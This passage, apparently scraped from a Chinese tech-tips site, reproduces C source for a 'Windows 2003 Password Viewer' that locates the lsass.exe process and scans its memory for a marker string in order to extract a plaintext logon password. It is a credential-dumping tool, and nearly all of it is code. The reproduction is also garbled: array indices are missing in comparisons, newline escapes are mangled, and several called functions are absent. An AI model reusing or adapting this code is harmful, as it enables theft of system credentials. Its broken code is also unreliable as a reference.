[10-20 18:28:36] 来源:http://www.67xuexi.com 电脑常识 阅读:85694次
// End Of Fucntion ProtoType Declaration
int main()
{
DWORD PID = 0;
printf("windows 2003 Password Viewer V1.0 By WinEggDrop/n/n");
if (!Is2003()) // Check Out If The Box Is 2003
{
printf("The Program Can't Only Run On windows 2003 Platform/n");
return -1;
}
PID = GetLsassPID(); // Get The Lsass.exe PID
if (PID == 0) // Fail To Get PID If Returning Zerom
{
return -1;
}
FindPassword(PID); // Find The Password From Lsass.exe Memory
return 0;
}
// End main()
//------------------------------------------------------------------------------------
// Purpose: Search The Memory & Try To Get The Password
// Return Type: int
// Parameters:
// In: char *Buffer --> The Memory Buffer To Search
// Out: const UINT nSize --> The Size Of The Memory Buffer
// Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure",
// Since The Password Is Near The Above Location,But It's Not Always True That
// We Will Find The Magic String,Or Even We Find It,The Password May Be Located
// At Some Other Place.We Only Look For Luck
//------------------------------------------------------------------------------------
int Search(char *Buffer,const UINT nSize)
{
UINT OffSet = 0;
UINT i = 0;
UINT j = 0 ;
UINT Count = 0;
if (Buffer == NULL)
{
return -1;
}
for (i = 0 ; i < nSize ; i++)
{
/* The Below Is To Find The Magic String,Why So Complicated?That Will Thank MS.The Separation From Word To Word
Is Not Separated With A Space,But With A Ending Character,So Any Search API Like strstr() Will Fail To Locate
The Magic String,We Have To Do It Manually And Slowly
*/
if (Buffer == 'L')
{
OffSet = 0;
if (strnicmp(&Buffer[i + OffSet],"LocalSystem",strlen("LocalSystem")) == 0)
{
OffSet += strlen("LocalSystem") + 1;
if (strnicmp(&Buffer[i + OffSet],"Remote",strlen("Remote")) == 0)
{
OffSet += strlen("Remote") + 1;
if (strnicmp(&Buffer[i + OffSet],"Procedure",strlen("Procedure")) == 0)
{
OffSet += strlen("Procedure") + 1;
if (strnicmp(&Buffer[i + OffSet],"Call",strlen("Call")) == 0)
{
i += OffSet;
break;
}
}
}
}
}
}
if (i < nSize)
{
ZeroMemory(Password,sizeof(Password));
for (; i < nSize ; i++)
{
if (Buffer == 0x02 && Buffer[i + 1] == 0 && Buffer[i + 2] == 0 && Buffer[i + 3] == 0 && Buffer[i + 4] == 0 && Buffer[i + 5] == 0 && Buffer[i + 6] == 0)
{
/* The Below Code Is To Retrieve The Password.Since The String Is In Unicode Format,So We Will Do It In
That Way
*/
j = i + 7;
for (; j < nSize; j += 2)
{
if (Buffer[j] > 0)
{
Password[Count++] = Buffer[j];
}
else
{
break;
}
}
return i + 7; // One Flag To Indicate We Find The Password
}
}
}
return -1; // Well,We Fail To Find The Password,And This Always Happens
}
// End Search
//------------------------------------------------------------------------------------
// Purpose: To Get The Lsass.exe PID
// Return Type: DWORD
// Parameters: None
//------------------------------------------------------------------------------------
DWORD GetLsassPID()
{
HANDLE hProcessSnap;
HANDLE hProcess = NULL;
PROCESSENTRY32 pe32;
DWORD PID = 0;
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if( hProcessSnap == INVALID_HANDLE_VALUE )
{
printf("Fail To Create Snap Shot/n");
return 0;
}
pe32.dwSize = sizeof(PROCESSENTRY32);
if( !Process32First(hProcessSnap, &pe32))
{
CloseHandle(hProcessSnap); // Must clean up the snapshot object!
return 0;
}
do
{
if (strcmpi(pe32.szExeFile,"Lsass.EXE") == 0)
{
PID = pe32.th32ProcessID;
break;
}
}while(Process32Next( hProcessSnap, &pe32));
CloseHandle( hProcessSnap);
return PID;
}
// End GetLsassPID()
//------------------------------------------------------------------------------------